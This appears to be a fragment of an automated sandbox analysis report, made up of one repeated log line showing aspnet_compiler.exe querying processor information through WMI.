Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
